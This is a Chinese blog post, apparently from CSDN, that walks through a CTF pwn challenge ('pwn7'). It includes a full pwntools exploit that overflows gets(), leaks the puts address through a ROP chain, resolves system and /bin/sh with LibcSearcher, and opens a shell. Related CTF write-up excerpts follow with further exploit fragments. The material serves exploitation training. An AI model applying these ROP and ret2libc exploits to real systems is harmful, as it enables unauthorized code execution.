pwn7第七关

最新推荐文章于 2024-05-06 09:07:33 发布
最新推荐文章于 2024-05-06 09:07:33 发布
阅读量489 收藏
点赞数 1
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_18823653/article/details/89007281
本文介绍了一种利用ROP技巧寻找Libc基址的方法,并通过泄露的puts函数地址来定位system及/bin/sh的位置,最终实现程序的远程控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的基地址,知道了哪个版本,就可以确定system()及/bin/sh的偏移,libc基地址加上偏移就是system的真实地址,这里用了一个python库LibcSearcher,github地址
基本用法:

from LibcSearcher import *

#第二个参数,为已泄露的实际地址,或最后12位(比如:d90),int类型
obj = LibcSearcher("fgets", 0X7ff39014bd90)

obj.dump("system")        #system 偏移
obj.dump("str_bin_sh")    #/bin/sh 偏移
obj.dump("__libc_start_main_ret")

exp如下:

from pwn import *
from LibcSearcher import *
context.log_level='debug'
sh = process('./pwn7')
elf = ELF('./pwn7')
payload='a'*112+p32(elf.plt['puts'])+p32(elf.symbols['main'])+p32(elf.got['puts'])
sh.sendline(payload)
sh.recvuntil('?')
puts_addr=u32(sh.recv(4))
libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
system_addr_real=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
payload1='a'*104+p32(system_addr_real)+'a'*4+p32(bin_sh)
sh.recvuntil('?')
sh.sendline(payload1)
sh.interactive()

至于为啥第二次104个字节就覆盖到返回地址,暂时还没想明白,gdb附件调试可以看出是104个

Gao's blog
关注
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1691
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
[CTF]PWN--新人入门第一--Ret2libc
2301_79880752的博客
02-29 1659
首先我们需要找到pop rdi|ret这个指令在程序中的位置(前面提到该指令为程序中自带的,只不过需要我们去寻找),然后让程序返回到pop rdi|ret这个指令上去执行它,通过ROPgadget --binary pwn --only 'pop|ret' 该指令来寻找pop |ret这个指令的地址,其中ROPgadget为一个插件,需要自己下载,binary意思为一个二进制文件,后面跟着的是文件名,only后面跟着的为要搜索的命令地址。
[BUUCTF-pwn]——bjdctf_2020_babyrop2
Y_peak的博客
02-25 361
[BUUCTF-pwn]——bjdctf_2020_babyrop2 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babyrop2 还是先checksec一下。开启了canary 在IDA中,一看发现思路很清楚呀 思路 给的提示好明显, 第一个函数给你提示,泄露libc 第二个格式化字符串漏洞,泄露canary 第三个函数栈溢出,有了canary和puts函数,我们就可以泄露出libc,进而构造获得shell的rop链 exploit from p
bjdctf_2020_babyrop2
、moddemod
07-06 624
注意这题开启了Canary 因为限制了payload长度就不可以写got表了,但是可以直接泄露Canary值,在vuln中进行栈溢出即可拿到shell… exp from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './bjdctf_2020_babyrop2' elf = ELF(proc_name) p = process(proc_name) p = remote('node3..
【BUUCTF】bjdctf_2020_babyrop2
m0_51251108的博客
12-30 453
【BUUCTF】bjdctf_2020_babyrop2 有canary ida看下程序 有格式化漏洞,但有6格宽度限制 有栈溢出 思路:这题靠格式化字符串漏洞泄露出canary的地址 然后栈溢出,ret2libc 泄露方法: 一次一次试过去,找到我们输入的位置的偏移 然后这题里偏移+1就是canary了 然后就能把canary带出来,canary每次运行都不一样 所以要实时接收 一个程序不同函数的canary好像都相同 特别提醒自己在接收环节的处理 exp: from pwn import*
2022ISCC PWN
山高路远
07-05 2453
2022ISCC
Pwn2Own 2010:Windows 7上的Internet Explorer 8漏洞利用解析
"Pwn2Own 2010 Windows 7 Internet Explorer 8 漏洞利用技术概述" 在2010年的Pwn2Own黑客大赛中,一位参赛者成功利用了Windows 7上的Internet Explorer 8(IE8)中的漏洞。这个攻击过程分为两个主要部分,展示了...
PWN入门之Stack Overflow
最新发布
2401_84434570的博客
05-06 1108
看一下正常情况,如果是正常情况的话,会返回到main函数中,这里需要注意一个细节,EIP这个寄存器,计算机会执行EIP指向的东西。根据这个原理,就可以进行构造,当ret的时候,EIP指向的东西为success函数的地址即可,这样就可以调用success函数了,从而达到劫持程序流的目的。在本篇文章中,我详细介绍了如何利用程序中本身存在的栈溢出漏洞,达到劫持程序流的目的,进而实现system("/bin/sh")的效果,如果你也对这个知识点感兴趣,欢迎阅读全文,内容篇幅较长,阅读时长约12分钟。
乱七八糟的pwn入门(八)——7.input
Z_Pathon的博客
03-20 298
审题 首先看题目: 没什么信息,再看代码: #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <arpa/inet.h> int main(int argc, char* arg...
[BUUCTF]PWN——bjdctf_2020_babyrop
mcmuyanga的博客
10-07 3492
bjdctf_2020_babyrop[64位libc泄露] 题目附件 解题步骤: 例行检查,64位程序,开启了NX保护 试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目 64位ida载入,shift+f12检索程序里的字符串,没有找到可以直接使用的system(’/bin/sh’) 从main函数开始看程序 main函数调用了一个vuln函数 buf的大小是0x20,read读入的长度是0x64,明显的溢出漏洞 根据已有的信息和得到的提示,是一道64位的libc泄露 利用思路:
[CTF]bjdctf_2020_babyrop2
m0_50819561的博客
10-07 566
格式化字符串漏洞+金丝雀绕过。 出现这种形式的,v2就是canary。 查看他在栈里的位置。 var_8就是canary。 利用格式化字符串漏洞。 %6$p表示输出第六个参数。 发现我们输入的东西在第六个参数的位置。 调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。 于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。 代码如下: from pwn import * from LibcSearche
BUUCTF-bjdctf_2020_babyrop2-WP
Rt1Text的博客
02-12 736
64位,NX和canary保护。
BUUOJ PWN bjdctf_2020_babyrop2
weixin_50287973的博客
11-12 279
开启的安全机制 main gift 利用格式化字符串泄露canary vuln 栈溢出泄露libc 栈溢出执行system(“bin/sh\x00”) scanf允许输入6字节,输入参数,输出偏移为6的地址,canary的偏移就为7 这样输入%7$p就可以泄露canary EXP from pwn import * from LibcSearcher import LibcSearcher p = remote("node3.buuoj.cn",27004) elf = ELF("./bjdc
buuctf bjdctf_2020_babyrop
carol2358的博客
05-02 488
常规libc 64位 from pwn import * from LibcSearcher import * local_file = './bjdctf_2020_babyrop' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2.23.so' select = 1 if sel...
[BUUCTF-pwn]——bjdctf_2020_babyrop
Y_peak的博客
02-12 355
[BUUCTF-pwn]——bjdctf_2020_babyrop 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babyrop 还是先checksec 一下 在IDA中看看 利用泄露地址和LibcSearcher库,找到对应的 libc版本算对偏移就可以找到system函数和 ‘/bin/sh’ 字符串. 因为64位,所以找下pop指令 思路: 泄露任意函数地址, 找到对应libc版本, 利用偏移寻找system函数和 ‘/bin/sh’ 字符串.
bjdctf2020 babyrop
pondzhang的专栏
05-09 354
from pwn import * p = process('./bjdctf_2020_babyrop') libcelf = ELF('./libc-2.23.so') pop_rdi_ret = 0x0000000000400733 pop_rsi_r15_ret = 0x0000000000400731 pltputs = 0x00000000004004E0 main = 0x00000000004006AD gotputs = 0x0000000000601018 payload = 'a' *
bjdctf_2020_babyrop【BUUCTF】
qq_41696518的博客
08-31 511
bjdctf_2020_babyrop
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值